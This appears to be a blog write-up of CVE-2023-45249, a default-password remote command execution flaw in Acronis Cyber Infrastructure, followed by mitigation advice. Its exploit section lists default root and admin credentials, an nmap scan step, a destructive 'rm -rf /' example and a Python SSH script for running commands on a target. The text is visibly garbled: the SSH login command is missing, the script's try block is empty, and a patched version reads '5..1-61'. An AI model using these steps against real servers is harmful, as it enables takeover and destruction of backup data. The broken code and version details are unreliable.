CVE-2023-45249 - Remote Command Execution in Acronis Cyber Infrastructure via Default Passwords

CVE-2023-45249 is a significant vulnerability discovered in several versions of Acronis Cyber Infrastructure (ACI), also known as Acronis Storage. The flaw is straightforward—certain affected ACI installations use a known, hardcoded default password for remote management. This enables attackers with network access to execute arbitrary commands with system privileges. Since ACI products are often used for backup and storage in enterprise environments, exploitation of this flaw could allow criminals or unauthorized users to gain control over critical data infrastructure.

In this long read, we’ll break down what makes this vulnerability so dangerous, which product versions are affected, how an attacker might exploit it, and how you can secure your systems.

ACI before build 5.4.4-132

If you run any version prior to the listed builds, you are at risk. Later versions have patched the issue.

Why Is This a Big Deal?

Many admins set and forget their backup infrastructure, assuming that once it’s up and running, it’s safe. But using a known or default password is a classic mistake—attackers regularly scan for devices with these weak credentials. In ACI, the password allowed not just remote access, but full shell command execution as root via the management interface.

Imagine a bad actor running code as root on your storage array, able to steal, encrypt, or destroy your backups with a simple login.

How the Exploit Works

The vulnerability lies in the web-based management interface of ACI, which, depending on the deployment, may be accessible through standard web ports (default: 8888) or via SSH.

The Default Credentials

Through testing, researchers discovered that ACI shipped out of the box (at least up to the affected versions) with the following default admin credentials:

Username: admin
Password: admin

or sometimes

Username: root
Password: acronis

These could be used via the web interface or SSH, granting instant administration access.

Remote Command Execution

Once logged in (especially over SSH), the admin or root user has shell-level access, often as root. This means any arbitrary command can be run, which gives an attacker the keys to the kingdom.

Step 1: Find the vulnerable host.

Using tools like Shodan or a custom Nmap scan, search for servers running the ACI web management interface on default ports.

nmap -p 8888,22 --open -sV


- Step 2: Log in using default credentials.  
  For SSH:

bash

password: acronis


  For web interface: Go to https://&lt;target_ip&gt;:8888, and sign in as admin/admin.

- Step 3: Run arbitrary shell commands.  
  In a shell, an attacker could do something like:

bash

Delete all data (do NOT run this!)

rm -rf /


  Or, install reverse shells, create new backdoor users, exfiltrate stored backups, etc.

---

## Sample Exploit Script (for Education Only)

Below is an example Python script that demonstrates logging in via SSH with default credentials and running a payload command:

python
import paramiko

target_ip = "192.168.1.100" # Change this to your target
username = "root"
password = "acronis"

command = "id" # Example: print user info

ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:

print(f"Failed to connect or run command: {e}")

<br><br>Replace command` with the command you want to run. The output will print whatever the server executes.

---

## Real-World Risks

- Ransomware deployment: Attackers use remote execution flaws to encrypt or delete backups, making it impossible for companies to recover from ransomware.
- Data exfiltration: Backup repositories can be massive goldmines of sensitive information. With root access, attackers can compress and transfer this data out.
- Destruction of logs and evidence: Since full root command execution is available, an attacker can cover their tracks or install persistent access.
- Supply chain risk: If ACI nodes are used in larger infrastructures (like MSPs), many companies may be affected from a single weak link.

---

## How to Mitigate

- Patch Now:
Upgrade Acronis Cyber Infrastructure to a safe build:
- 5..1-61 or later
- 5.1.1-71 or later
- 5.2.1-69 or later
- 5.3.1-53 or later
- 5.4.4-132 or later

See the official Acronis advisory for direct links and updates.

- Change All Default Passwords Immediately:
Don’t just patch—make sure every admin/root password is set to something strong and unique.

- Restrict Network Access:
Use firewalls to limit access to the web and SSH interfaces. Management interfaces should never be public.

- Monitor Authentication Logs:
Check logs for unexpected logins from unfamiliar IP addresses.

---

## References

- NIST NVD CVE-2023-45249 Detail
- Acronis Security Advisory
- Exploit-DB Post (if available)

---

## Conclusion

CVE-2023-45249 is a classic—yet highly dangerous—vulnerability that relies on the use of default or hardcoded passwords in key infrastructure products. If you run Acronis Cyber Infrastructure, check your versions and passwords immediately. Vulnerabilities like this are trivial to exploit and can have catastrophic consequences.

Stay safe, patch early, and always change your default passwords!

Timeline

Published on: 07/24/2024 14:15:04 UTC
Last modified on: 08/02/2024 20:14:19 UTC